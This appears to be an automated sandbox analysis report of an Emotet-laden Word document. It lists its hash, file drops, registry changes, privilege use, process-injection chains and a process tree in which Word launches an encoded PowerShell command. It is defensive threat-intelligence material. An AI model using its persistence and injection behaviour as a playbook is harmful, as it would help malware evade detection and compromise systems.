Task
task1
Sample
Docs_129a4380ebaff7cfc82bfe05e7d282ff.html.doc
Resource
win7
Task
task2
Sample
Docs_129a4380ebaff7cfc82bfe05e7d282ff.html.doc
Resource
win10
General
-
Target
Docs_129a4380ebaff7cfc82bfe05e7d282ff.html
-
Sample
191017-bvrhgps4xs
-
SHA256
012987f43b78cbbd7648fd8fbd4660423486e120f0a42cb155b0169a1f928e45
Malware Config
Extracted
emotet
Signatures
-
Suspicious behavior: AddClipboardFormatListener
-
Suspicious use of SetWindowsHookEx
-
at    description    ioc    Process
4057    File opened for modification    C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm    WINWORD.EXE
4072    File opened for modification    C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm    WINWORD.EXE
4072    File created    C:\Users\Admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm    WINWORD.EXE
4712    File opened for modification    C:\Users\Admin\AppData\Local\Temp\Docs_129a4380ebaff7cfc82bfe05e7d282ff.html.doc    WINWORD.EXE
5149    File created    C:\Users\Admin\AppData\Local\Temp\~$cs_129a4380ebaff7cfc82bfe05e7d282ff.html.doc    WINWORD.EXE
-
Drops file in system dir 17 IoCs
at    description    ioc    Process
5383    File deleted    C:\Windows\System32\spool\drivers\x64\3\mxdwdui.BUD    WINWORD.EXE
5383    File created    C:\Windows\system32\spool\DRIVERS\x64\3\mxdwdui.BUD    WINWORD.EXE
9329    File opened for modification    C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk    powershell.exe
9376    File opened for modification    C:\Windows\system32\GDIPFONTCACHEV1.DAT    WINWORD.EXE
32807    File renamed    C:\Users\Admin\506.exe => C:\Windows\SysWOW64\loadarouter.exe    506.exe
50514    File opened for modification    C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat    loadarouter.exe
148810    File created (read-only)    C:\Windows\TEMP\B49E.tmp    loadarouter.exe
148810    File created (read-only)    C:\Windows\TEMP\B4AF.tmp    loadarouter.exe
148810    File deleted    C:\Windows\Temp\B49E.tmp    loadarouter.exe
148810    File deleted    C:\Windows\Temp\B4AF.tmp    loadarouter.exe
148810    File created (read-only)    C:\Windows\TEMP\B4B0.tmp    loadarouter.exe
148810    File deleted    C:\Windows\Temp\B4B0.tmp    loadarouter.exe
148825    File created    C:\Windows\SysWOW64\loadaroutera.exe    loadarouter.exe
148825    File opened for modification    C:\Windows\SysWOW64\loadaroutera.exe    loadarouter.exe
148825    File created    C:\Windows\SysWOW64\loadarouterb.exe    loadarouter.exe
148841    File deleted    C:\Windows\SysWOW64\loadarouterb.exe    loadarouter.exe
148841    File deleted    C:\Windows\SysWOW64\loadaroutera.exe    loadarouter.exe
-
Modifies registry class 1 TTPs 280 IoCs
WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F}\ = "TabStripEvents" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = 
"SpinbuttonEvents" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776}\ = "SpinbuttonEvents" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D}\ = "WHTMLControlEvents" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = 
"WHTMLControlEvents1" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents1" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) 
\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents4" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents5" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents6" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} 
WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE6-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents7" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE 7645 Key created 
\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE 7645 Key created 
\REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE 7645 Key created \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE 7645 Set value (str) \REGISTRY\USER\S-1-5-21-2130127925-3255122776-1239856527-1000_CLASSES\Wow6432Node\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" WINWORD.EXE -
Suspicious use of FindShellTrayWindow
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
at  description  Process
15211  Token: SeDebugPrivilege  powershell.exe
-
Suspicious behavior: EnumeratesProcesses
-
Uses Task Scheduler COM API 1 TTPs 12 IoCs
at  description  ioc  Process
20281  Key opened  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}  OSPPSVC.EXE
20281  Key queried  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}  OSPPSVC.EXE
20281  Key opened  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\TreatAs  OSPPSVC.EXE
20281  Key opened  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\Progid  OSPPSVC.EXE
20281  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\ProgID\  OSPPSVC.EXE
20281  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\  OSPPSVC.EXE
20281  Key opened  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32  OSPPSVC.EXE
20281  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\InprocServer32  OSPPSVC.EXE
20281  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\  OSPPSVC.EXE
20281  Key value queried  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32\ThreadingModel  OSPPSVC.EXE
20281  Key opened  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler32  OSPPSVC.EXE
20281  Key opened  \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocHandler  OSPPSVC.EXE
-
Suspicious use of WriteProcessMemory 5 IoCs
at  description  Process  procid_target
27363  PID 840 wrote to memory of 1976  powershell.exe  29
27971  PID 1976 wrote to memory of 1768  506.exe  30
33712  PID 1752 wrote to memory of 1172  loadarouter.exe  32
148810  PID 1172 wrote to memory of 1340  loadarouter.exe  35
148997  PID 1340 wrote to memory of 1556  VkMQcr34DP0mKTUDmSk.exe  36
-
Executes dropped EXE
-
description  ioc  Process
Event created  Global\E64C019BB  506.exe
-
Suspicious behavior: EmotetMutantsSpam
-
Loads dropped DLL
-
emotet family
Processes
-
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_129a4380ebaff7cfc82bfe05e7d282ff.html.doc"
- Drops Office document
- Drops file in system dir
- Modifies registry class
PID:1260
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -e 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
- Drops file in system dir
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:840
-
C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "5132580951022363388-17572451541480729789-1433489876-11657742471676885814-127177489"
PID:1592
-
C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE
"C:\Program Files\Common Files\Microsoft Shared\OfficeSoftwareProtectionPlatform\OSPPSVC.EXE"
- Uses Task Scheduler COM API
PID:1944
-
C:\Users\Admin\506.exe
"C:\Users\Admin\506.exe"
- Suspicious use of WriteProcessMemory
PID:1976
-
C:\Users\Admin\506.exe
--dec73219
- Drops file in system dir
- Emotet Sync
PID:1768
-
C:\Windows\SysWOW64\loadarouter.exe
"C:\Windows\SysWOW64\loadarouter.exe"
- Suspicious use of WriteProcessMemory
PID:1752
-
C:\Windows\SysWOW64\loadarouter.exe
--f7a216da
- Drops file in system dir
- Suspicious use of WriteProcessMemory
PID:1172
-
C:\ProgramData\VkMQcr34DP0mKTUDmSk.exe
"C:\ProgramData\VkMQcr34DP0mKTUDmSk.exe"
- Suspicious use of WriteProcessMemory
PID:1340
-
C:\ProgramData\VkMQcr34DP0mKTUDmSk.exe
--af85d12c
PID:1556